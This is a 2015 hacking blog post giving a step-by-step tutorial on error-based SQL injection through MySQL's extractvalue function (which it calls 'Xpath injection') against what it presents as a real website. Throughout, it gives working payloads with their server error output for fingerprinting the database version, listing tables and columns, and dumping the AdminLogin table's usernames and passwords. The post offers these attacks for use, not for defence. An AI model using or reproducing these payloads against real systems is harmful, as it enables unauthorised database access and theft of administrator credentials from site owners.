Sunday, December 6, 2015

How To Dump All Data In One Shot In Xpath Injection by Darky!!

Welcome back to TechynHacky!!
I am Asman and Today I will show you How To Dump All Data In One Shot In Xpath Injection.
So Lets starts :-)
Here Is  our Test site!! :)


First Found Xpath Vulnerablity Using


Website will  Respond this!

[Incorrect parameter count in the call to native function 'extractvalue']

It means Website Is Vulnerable To XPATH Extractvalue Injection.!!

Okay Now Next Step :-)
Now Lets Find The Database & Version Of Database.
Here we will use this Query!

+Procedure Analyse+(extractvalue(0,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -

Our Website With Query will look like this!!,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -

Website will responce something like this :-)

[XPATH syntax error: ''BlaCkRose:5.1.54-log:LTD']

In Simple Injection We Can't Extract Database, Version, & Table, Columns, In Single Query

Okay So Now We Need Tables Of Website..
So Here is our next Query!!

+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -

Using This Query We Can Extract All Tables Of Website From Database.
Website will look like  this with query!!,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -

Website Responce

[XPATH syntax error: ''s,AdminLogin,Agencia,Agente,Bro']

Now We Need Columns Of Table AdminLogin,
So Lets Start!!!
Next Query!!

+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=TABLE HEX))),1)-- -

[AdminLogin] is a Weak Table In Database,
Okay Now Convert AdminLogin into HEX Format using online tools like!!

and Yes also if you are Using Hackbar then just  Click On [Encoding > HEX Encoding > String To 00ff00ff]

Type AdminLogin In the PoP-Up Window And Hit Enter!!
and Use Hex Format In Query Like This [0xHEX FORMAT OF THE TABLE]

Website with Query will look like this!!,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x41646d696e4c6f67696e))),1)-- -

Website Responding this!!

[XPATH syntax error: ''id,usuario,passw']

[usuario, passw,] are Weak Columns In Table AdminLogin,
So our Next Query will be this!!

+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column1,0x7e,column2)+from+TABLE_NAME))),1)-- -

Now replace!
TABLE_NAME = AdminLogin
COLUMN1 = usuario
COLUMN2 = passw

Now our website with Query will look like this!!,concat(0x27,(select+group_concat(usuario,0x7e,passw)+from+AdminLogin))),1)-- -

Website is respondin this!!
XPATH syntax error: ''admin~admin'

Here we got our things!! :-D
and We are Done.. :-P

Thanks for reading and Visiting :-P

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